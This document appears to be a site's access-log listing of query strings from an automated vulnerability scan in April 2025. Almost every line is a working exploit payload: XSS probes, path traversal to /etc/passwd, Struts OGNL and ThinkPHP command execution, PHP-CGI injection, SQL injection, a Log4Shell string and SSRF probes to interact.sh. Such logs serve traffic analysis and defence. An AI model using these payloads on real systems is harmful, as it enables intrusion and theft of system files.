29 Apr/28/25 2:47 AM  /?up='>"<svg/onload=confirm('xss-up')>&body='>"<svg/onload=confirm('xss-body')>&return='>"<svg/onload=confirm('xss-return')>&end='>"<svg/onload=confirm('xss-end')>&n='>"<svg/onload=confirm('xss-n')>&opt='>"<svg/onload=confirm('xss-opt')>&source='>"<svg/onload=confirm('xss-source')>&y='>"<svg/onload=confirm('xss-y')>&parent='>"<svg/onload=confirm('xss-parent')>&reason='>"<svg/onload=confirm('xss-reason')>&meta='>"<svg/onload=confirm('xss-meta')>&pass1='>"<svg/onload=confirm('xss-pass1')>&blog='>"<svg/onload=confirm('xss-blog')>&plugin='>"<svg/onload=confirm('xss-plugin')>
29 Apr/28/25 2:47 AM  /?SPX_KEY=testing&SPX_UI_URI=/
29 Apr/28/25 2:47 AM  /?query=SHOW DATABASES
29 Apr/28/25 2:47 AM  /?{alert(document.domain)}
29 Apr/28/25 2:47 AM  /?s=index/index/index
29 Apr/28/25 2:47 AM  /?location='>"<svg/onload=confirm('xss-location')>&link_url='>"<svg/onload=confirm('xss-link_url')>&post_mime_type='>"<svg/onload=confirm('xss-post_mime_type')>&uid='>"<svg/onload=confirm('xss-uid')>&host='>"<svg/onload=confirm('xss-host')>&cmd='>"<svg/onload=confirm('xss-cmd')>&link_id='>"<svg/onload=confirm('xss-link_id')>&reset='>"<svg/onload=confirm('xss-reset')>&nonce='>"<svg/onload=confirm('xss-nonce')>&username='>"<svg/onload=confirm('xss-username')>&site='>"<svg/onload=confirm('xss-site')>&do='>"<svg/onload=confirm('xss-do')>&email='>"<svg/onload=confirm('xss-email')>
29 Apr/28/25 2:46 AM  /?format="><script>alert(document.domain)</script>
29 Apr/28/25 2:47 AM  /?edit-menu-item='>"<svg/onload=confirm('xss-edit-menu-item')>&error='>"<svg/onload=confirm('xss-error')>&post_title='>"<svg/onload=confirm('xss-post_title')>&x='>"<svg/onload=confirm('xss-x')>&down='>"<svg/onload=confirm('xss-down')>&state='>"<svg/onload=confirm('xss-state')>&data='>"<svg/onload=confirm('xss-data')>&auth='>"<svg/onload=confirm('xss-auth')>&themes='>"<svg/onload=confirm('xss-themes')>&captcha='>"<svg/onload=confirm('xss-captcha')>&nickname='>"<svg/onload=confirm('xss-nickname')>&allusers='>"<svg/onload=confirm('xss-allusers')>&color='>"<svg/onload=confirm('xss-color')>&path='>"<svg/onload=confirm('xss-path')>
29 Apr/28/25 2:46 AM  /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini
29 Apr/28/25 2:46 AM  /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe
29 Apr/28/25 2:47 AM  /?page=step_1
29 Apr/28/25 2:47 AM  /?SPX_KEY=stg&SPX_UI_URI=/
29 Apr/28/25 2:47 AM  /?subject='>"<svg/onload=confirm('xss-subject')>&sticky='>"<svg/onload=confirm('xss-sticky')>&ns='>"<svg/onload=confirm('xss-ns')>&history='>"<svg/onload=confirm('xss-history')>&category_id='>"<svg/onload=confirm('xss-category_id')>&metakeyselect='>"<svg/onload=confirm('xss-metakeyselect')>&copy='>"<svg/onload=confirm('xss-copy')>&product_id='>"<svg/onload=confirm('xss-product_id')>&status='>"<svg/onload=confirm('xss-status')>&cat='>"<svg/onload=confirm('xss-cat')>&list='>"<svg/onload=confirm('xss-list')>&val='>"<svg/onload=confirm('xss-val')>&what='>"<svg/onload=confirm('xss-what')>&group_id='>"<svg/onload=confirm('xss-group_id')>
29 Apr/28/25 2:46 AM  /?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug
29 Apr/28/25 2:44 AM  /?f=\\[
29 Apr/28/25 2:47 AM  /?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK
29 Apr/28/25 2:46 AM  /?q=node&destination=node
29 Apr/28/25 2:44 AM  /?torrent
29 Apr/28/25 2:47 AM  /?hc="><script>alert(document.domain)</script>
29 Apr/28/25 2:47 AM  /?pp=env
29 Apr/28/25 2:47 AM  /?redirect='>"<svg/onload=confirm('xss-redirect')>&linkcheck='>"<svg/onload=confirm('xss-linkcheck')>&port='>"<svg/onload=confirm('xss-port')>&password='>"<svg/onload=confirm('xss-password')>&target='>"<svg/onload=confirm('xss-target')>&method='>"<svg/onload=confirm('xss-method')>&note='>"<svg/onload=confirm('xss-note')>&amount='>"<svg/onload=confirm('xss-amount')>&set='>"<svg/onload=confirm('xss-set')>&q='>"<svg/onload=confirm('xss-q')>&select='>"<svg/onload=confirm('xss-select')>&cid='>"<svg/onload=confirm('xss-cid')>&tag='>"<svg/onload=confirm('xss-tag')>&keyword='>"<svg/onload=confirm('xss-keyword')>
29 Apr/28/25 2:47 AM  /?sort='>"<svg/onload=confirm('xss-sort')>&msg='>"<svg/onload=confirm('xss-msg')>&hostname='>"<svg/onload=confirm('xss-hostname')>&directory='>"<svg/onload=confirm('xss-directory')>&disabled='>"<svg/onload=confirm('xss-disabled')>&last_name='>"<svg/onload=confirm('xss-last_name')>&oauth_token='>"<svg/onload=confirm('xss-oauth_token')>&first_name='>"<svg/onload=confirm('xss-first_name')>&delete_widget='>"<svg/onload=confirm('xss-delete_widget')>&md5='>"<svg/onload=confirm('xss-md5')>&selection='>"<svg/onload=confirm('xss-selection')>&filename='>"<svg/onload=confirm('xss-filename')>&address='>"<svg/onload=confirm('xss-address')>
29 Apr/28/25 2:46 AM  /?IO.popen('cat /etc/passwd').read%0A#
29 Apr/28/25 2:45 AM  /?src=connect
29 Apr/28/25 2:47 AM  /?i='>"<svg/onload=confirm('xss-i')>&database='>"<svg/onload=confirm('xss-database')>&tax_input='>"<svg/onload=confirm('xss-tax_input')>&secret='>"<svg/onload=confirm('xss-secret')>&mod='>"<svg/onload=confirm('xss-mod')>&s='>"<svg/onload=confirm('xss-s')>&stage='>"<svg/onload=confirm('xss-stage')>&time='>"<svg/onload=confirm('xss-time')>&new='>"<svg/onload=confirm('xss-new')>&api_key='>"<svg/onload=confirm('xss-api_key')>&invalid='>"<svg/onload=confirm('xss-invalid')>&db='>"<svg/onload=confirm('xss-db')>&upload='>"<svg/onload=confirm('xss-upload')>&tablename='>"<svg/onload=confirm('xss-tablename')>
29 Apr/28/25 2:47 AM  /?subreddit=news&score=2134"><script>alert(document.domain)</script>
29 Apr/28/25 2:44 AM  /?q=admin/views/ajax/autocomplete/user/a
29 Apr/28/25 2:46 AM  /?url=http://interact.sh
29 Apr/28/25 2:47 AM  /?widget='>"<svg/onload=confirm('xss-widget')>&height='>"<svg/onload=confirm('xss-height')>&screen='>"<svg/onload=confirm('xss-screen')>&pass2='>"<svg/onload=confirm('xss-pass2')>&redirect_to='>"<svg/onload=confirm('xss-redirect_to')>&items='>"<svg/onload=confirm('xss-items')>&string='>"<svg/onload=confirm('xss-string')>&hidden='>"<svg/onload=confirm('xss-hidden')>&f='>"<svg/onload=confirm('xss-f')>&step='>"<svg/onload=confirm('xss-step')>&role='>"<svg/onload=confirm('xss-role')>&preview_nonce='>"<svg/onload=confirm('xss-preview_nonce')>&date='>"<svg/onload=confirm('xss-date')>&event='>"<svg/onload=confirm('xss-event')>
29 Apr/28/25 2:47 AM  /?a=display&templateFile=README.md
29 Apr/28/25 2:47 AM  /?send='>"<svg/onload=confirm('xss-send')>&attachment_id='>"<svg/onload=confirm('xss-attachment_id')>&wp_screen_options='>"<svg/onload=confirm('xss-wp_screen_options')>&page_id='>"<svg/onload=confirm('xss-page_id')>&locale='>"<svg/onload=confirm('xss-locale')>&function='>"<svg/onload=confirm('xss-function')>&profile='>"<svg/onload=confirm('xss-profile')>&day='>"<svg/onload=confirm('xss-day')>&folder='>"<svg/onload=confirm('xss-folder')>&mobile='>"<svg/onload=confirm('xss-mobile')>&settings='>"<svg/onload=confirm('xss-settings')>&comments='>"<svg/onload=confirm('xss-comments')>&all='>"<svg/onload=confirm('xss-all')>&menu='>"<svg/onload=confirm('xss-menu')>
29 Apr/28/25 2:46 AM  /?doAs=`echo+CVE-2022-33891+|+rev`
29 Apr/28/25 2:47 AM  /?page=../../../../../windows/win.ini
29 Apr/28/25 2:47 AM  /?SPX_KEY=spx&SPX_UI_URI=/
29 Apr/28/25 2:47 AM  /?q=./gibbon.sql
29 Apr/28/25 2:46 AM  /?lang=../../thinkphp/base
29 Apr/28/25 2:46 AM  /?name=%25{(#dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess%3F(#_memberAccess%3D#dm):((#container%3D#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil%3D#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd%3D'cat /etc/passwd').(#iswin%3D(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds%3D(#iswin%3F{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p%3Dnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process%3D#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
29 Apr/28/25 2:47 AM  /?name='>"<svg/onload=confirm('xss-name')>&json='>"<svg/onload=confirm('xss-json')>&id_base='>"<svg/onload=confirm('xss-id_base')>&where='>"<svg/onload=confirm('xss-where')>&request='>"<svg/onload=confirm('xss-request')>&notes='>"<svg/onload=confirm('xss-notes')>&img='>"<svg/onload=confirm('xss-img')>&a='>"<svg/onload=confirm('xss-a')>&menu-item='>"<svg/onload=confirm('xss-menu-item')>&xml='>"<svg/onload=confirm('xss-xml')>&columns='>"<svg/onload=confirm('xss-columns')>&service='>"<svg/onload=confirm('xss-service')>&site_id='>"<svg/onload=confirm('xss-site_id')>
29 Apr/28/25 2:44 AM  /?dev
29 Apr/28/25 2:47 AM  /?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
29 Apr/28/25 2:47 AM  /?SPX_KEY=prod&SPX_UI_URI=/
29 Apr/28/25 2:47 AM  /?tab='>"<svg/onload=confirm('xss-tab')>&domain='>"<svg/onload=confirm('xss-domain')>&show='>"<svg/onload=confirm('xss-show')>&submit='>"<svg/onload=confirm('xss-submit')>&move='>"<svg/onload=confirm('xss-move')>&userid='>"<svg/onload=confirm('xss-userid')>&oitar='>"<svg/onload=confirm('xss-oitar')>&key='>"<svg/onload=confirm('xss-key')>&description='>"<svg/onload=confirm('xss-description')>&user='>"<svg/onload=confirm('xss-user')>&active='>"<svg/onload=confirm('xss-active')>&clone='>"<svg/onload=confirm('xss-clone')>&success='>"<svg/onload=confirm('xss-success')>&slug='>"<svg/onload=confirm('xss-slug')>
29 Apr/28/25 2:46 AM  /?server=db&username=root&db=mysql&table=event</script><script>alert(document.domain)</script>
29 Apr/28/25 2:47 AM  /?pretty
29 Apr/28/25 2:46 AM  /?action=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /?taxonomy='>"<svg/onload=confirm('xss-taxonomy')>&tables='>"<svg/onload=confirm('xss-tables')>&confirm='>"<svg/onload=confirm('xss-confirm')>&db_port='>"<svg/onload=confirm('xss-db_port')>&op='>"<svg/onload=confirm('xss-op')>&untrashed='>"<svg/onload=confirm('xss-untrashed')>&tid='>"<svg/onload=confirm('xss-tid')>&flag='>"<svg/onload=confirm('xss-flag')>&stylesheet='>"<svg/onload=confirm('xss-stylesheet')>&download='>"<svg/onload=confirm('xss-download')>&comment_status='>"<svg/onload=confirm('xss-comment_status')>&_wpnonce='>"<svg/onload=confirm('xss-_wpnonce')>&metakeyinput='>"<svg/onload=confirm('xss-metakeyinput')>&remove='>"<svg/onload=confirm('xss-remove')>
29 Apr/28/25 2:47 AM  /?attachment='>"<svg/onload=confirm('xss-attachment')>&dbname='>"<svg/onload=confirm('xss-dbname')>&rows='>"<svg/onload=confirm('xss-rows')>&parent_id='>"<svg/onload=confirm('xss-parent_id')>&lang='>"<svg/onload=confirm('xss-lang')>&fid='>"<svg/onload=confirm('xss-fid')>&text='>"<svg/onload=confirm('xss-text')>&link='>"<svg/onload=confirm('xss-link')>&timeout='>"<svg/onload=confirm('xss-timeout')>&db_name='>"<svg/onload=confirm('xss-db_name')>&ids='>"<svg/onload=confirm('xss-ids')>&w='>"<svg/onload=confirm('xss-w')>&provider='>"<svg/onload=confirm('xss-provider')>&plugin_status='>"<svg/onload=confirm('xss-plugin_status')>
29 Apr/28/25 2:47 AM  /?q=info
29 Apr/28/25 2:46 AM  /?layout=/etc/passwd
29 Apr/28/25 2:46 AM  /?url=http://0177.0.0.1/server-status
29 Apr/28/25 2:47 AM  /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection
29 Apr/28/25 2:47 AM  /?t='>"<svg/onload=confirm('xss-t')>&comment='>"<svg/onload=confirm('xss-comment')>&post_id='>"<svg/onload=confirm('xss-post_id')>&postid='>"<svg/onload=confirm('xss-postid')>&config='>"<svg/onload=confirm('xss-config')>&login='>"<svg/onload=confirm('xss-login')>&paged='>"<svg/onload=confirm('xss-paged')>&go='>"<svg/onload=confirm('xss-go')>&tag_ID='>"<svg/onload=confirm('xss-tag_ID')>&user_login='>"<svg/onload=confirm('xss-user_login')>&part='>"<svg/onload=confirm('xss-part')>&preview_id='>"<svg/onload=confirm('xss-preview_id')>&_ajax_nonce='>"<svg/onload=confirm('xss-_ajax_nonce')>&widget-id='>"<svg/onload=confirm('xss-widget-id')>
29 Apr/28/25 2:45 AM  /?locale=en
29 Apr/28/25 2:47 AM  /?PHPRC=/dev/fd/0
29 Apr/28/25 2:46 AM  /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE
29 Apr/28/25 2:45 AM  /?path=/settings/about
29 Apr/28/25 2:47 AM  /?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&sort=latest&page=index.php&format=xml&task=showproducts&view=med&sortdir=descgt5po<img src=a onerror=alert(document.domain)>vh217
29 Apr/28/25 2:47 AM  /?SPX_KEY=test&SPX_UI_URI=/
29 Apr/28/25 2:44 AM  /?wsdl
29 Apr/28/25 2:47 AM  /?view=log
29 Apr/28/25 2:47 AM  /?g=obj_app_upfile
29 Apr/28/25 2:46 AM  /?mp_idx=";alert('1');//
29 Apr/28/25 2:46 AM  /?lang="></script><script>alert(document.domain)</script><p class="&p=1
29 Apr/28/25 2:47 AM  /?activated='>"<svg/onload=confirm('xss-activated')>&trigger='>"<svg/onload=confirm('xss-trigger')>&loggedout='>"<svg/onload=confirm('xss-loggedout')>&script='>"<svg/onload=confirm('xss-script')>&query='>"<svg/onload=confirm('xss-query')>&file_name='>"<svg/onload=confirm('xss-file_name')>&fname='>"<svg/onload=confirm('xss-fname')>&options='>"<svg/onload=confirm('xss-options')>&export='>"<svg/onload=confirm('xss-export')>&post='>"<svg/onload=confirm('xss-post')>&p='>"<svg/onload=confirm('xss-p')>&action2='>"<svg/onload=confirm('xss-action2')>&c='>"<svg/onload=confirm('xss-c')>&destination='>"<svg/onload=confirm('xss-destination')>
29 Apr/28/25 2:46 AM  /?id=%25{(#instancemanager%3D#application["org.apache.tomcat.InstanceManager"]).(#stack%3D#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean%3D#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context%3D#bean.get("context")).(#bean.setBean(#context)).(#macc%3D#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset%3D#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist%3D#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("cat+/etc/passwd")).(#execute%3D#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
29 Apr/28/25 2:47 AM  /?color="><img src onerror%3dalert(document.domain)><"'
29 Apr/28/25 2:47 AM  /?SPX_KEY=dev&SPX_UI_URI=/
29 Apr/28/25 2:47 AM  /?SPX_KEY=prd&SPX_UI_URI=/
25 Apr/28/25 2:50 AM  /?location=search
25 Apr/28/25 2:50 AM  /?x=${jndi:ldap://127.0.0.1
22 Apr/28/25 2:47 AM  /?true
14 Apr/16/25 1:05 PM  /?198.235.24.138
12 Apr/28/25 2:47 AM  /?meta=<svg/onload=confirm(document.domain)>
8030 Apr/28/25 2:50 AM/index.php
551 Apr/28/25 2:46 AM  /index.php?module=users/login
87 Apr/28/25 2:50 AM  /index.php?c=blocked&action=continue
66 Apr/28/25 2:47 AM  /index.php?controller=pjAdmin&action=<img+src%3Dx+onerror%3Dprompt(document.domain)>
58 Apr/28/25 2:46 AM  /index.php?owa_do=base.loginForm&owa_site_id
29 Apr/28/25 2:46 AM  /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input
29 Apr/28/25 2:46 AM  /index.php?p=banlist&advSearch=0'"></script><script>alert(document.domain)</script>&advType=btype
29 Apr/28/25 2:46 AM  /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
29 Apr/28/25 2:47 AM  /index.php?noAUTO=1
29 Apr/28/25 2:46 AM  /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
29 Apr/28/25 2:47 AM  /index.php?s=captcha
29 Apr/28/25 2:46 AM  /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=(select*from(select(sleep(6)))a)
29 Apr/28/25 2:47 AM  /index.php?page=/etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?page=/etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?sl=../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?from="><script>alert(document.domain)</script>
29 Apr/28/25 2:46 AM  /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?class=../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1)
29 Apr/28/25 2:46 AM  /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image
29 Apr/28/25 2:45 AM  /index.php?s=/admin/Index/index
29 Apr/28/25 2:46 AM  /index.php?redirect=/\\/interact.sh/
29 Apr/28/25 2:46 AM  /index.php?m=user&c=Users&a=logout&referurl=https://interact.sh
29 Apr/28/25 2:45 AM  /index.php?v=d
29 Apr/28/25 2:46 AM  /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?page=etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?appservlang=<svg/onload=confirm('xss')>
29 Apr/28/25 2:46 AM  /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?option=com_booking&controller=customer&task=getUserData&id=123
29 Apr/28/25 2:47 AM  /index.php?content=../../../../../../../../etc/passwd
29 Apr/28/25 2:47 AM  /index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&locale&hide=0&index=4005&index=0&pickup_id="><script>alert(document.domain)</script>&cid=1&view=1&month=7&year=2023&start_dt&end_dt&session_id
29 Apr/28/25 2:47 AM  /index.php?m=member&f=login_save
29 Apr/28/25 2:47 AM  /index.php?page=windows/win.ini%00
29 Apr/28/25 2:46 AM  /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?r=installer/welcome
29 Apr/28/25 2:46 AM  /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?route=/
29 Apr/28/25 2:47 AM  /index.php?page=../../../../../../../../../../etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?s=Admin-Data-down&id=../../Conf/config.php
29 Apr/28/25 2:46 AM  /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jejob&view=../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?success=</script><script>alert(document.cookie)%3B</script>
29 Apr/28/25 2:47 AM  /index.php?page=../../etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?page=windows/win.ini
29 Apr/28/25 2:47 AM  /index.php?page=install
29 Apr/28/25 2:46 AM  /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?c=api&m=data2&function=<script>alert(document.domain)</script>p&format=php
29 Apr/28/25 2:46 AM  /index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?redirect=true&meth=ajax
29 Apr/28/25 2:46 AM  /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1)
29 Apr/28/25 2:46 AM  /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?lvl=author_see&id=42691'><script>alert(document.domain)</script>
29 Apr/28/25 2:46 AM  /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?id=50&file=../../../../../../../../../etc/passwd
29 Apr/28/25 2:47 AM  /index.php?controller=pjFront&action=pjActionServices&locale=1&index="><script>alert(document.domain)</script>
29 Apr/28/25 2:46 AM  /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?action=Login&module=Users&print=a&"/><script>alert(1)</script>
29 Apr/28/25 2:46 AM  /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?app=main&inc=core_auth&route=login
29 Apr/28/25 2:46 AM  /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
29 Apr/28/25 2:46 AM  /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
29 Apr/28/25 2:47 AM  /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)
29 Apr/28/25 2:46 AM  /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails
29 Apr/28/25 2:46 AM  /index.php?page&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1
29 Apr/28/25 2:46 AM  /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
29 Apr/28/25 2:46 AM  /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?m&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test\")+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+a
29 Apr/28/25 2:46 AM  /index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
29 Apr/28/25 2:47 AM  /index.php?page=../../windows/win.ini
29 Apr/28/25 2:46 AM  /index.php?option=com_extplorer&action=show_error&dir=../../..//../../etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_canteen&controller=../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?q=category&search=Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19--+
29 Apr/28/25 2:47 AM  /index.php?action=porte_plume_previsu
29 Apr/28/25 2:46 AM  /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?action=login.index
29 Apr/28/25 2:46 AM  /index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=
29 Apr/28/25 2:46 AM  /index.php?debug_host=</script><script>alert(document.domain)</script>&start_debug=1
29 Apr/28/25 2:46 AM  /index.php?showmessage=4&customermail=\"><h2>TEST</h2>
29 Apr/28/25 2:47 AM  /index.php?controller=pjFront&action=pjActionSearch&session_id&locale=1&index="><script>alert(document.domain)</script>&date
29 Apr/28/25 2:46 AM  /index.php?action=post&order=bszop"><script>alert(document.domain)</script>
29 Apr/28/25 2:47 AM  /index.php?mod=system&op=orgtree&do=orgtree
29 Apr/28/25 2:46 AM  /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?controller=pjFront&action=pjActionGetBookingForm&session_id="><script>alert(document.domain)</script>&cid=1&view=1&month=7&year=2023&start_dt&end_dt&locale&index=0
29 Apr/28/25 2:46 AM  /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
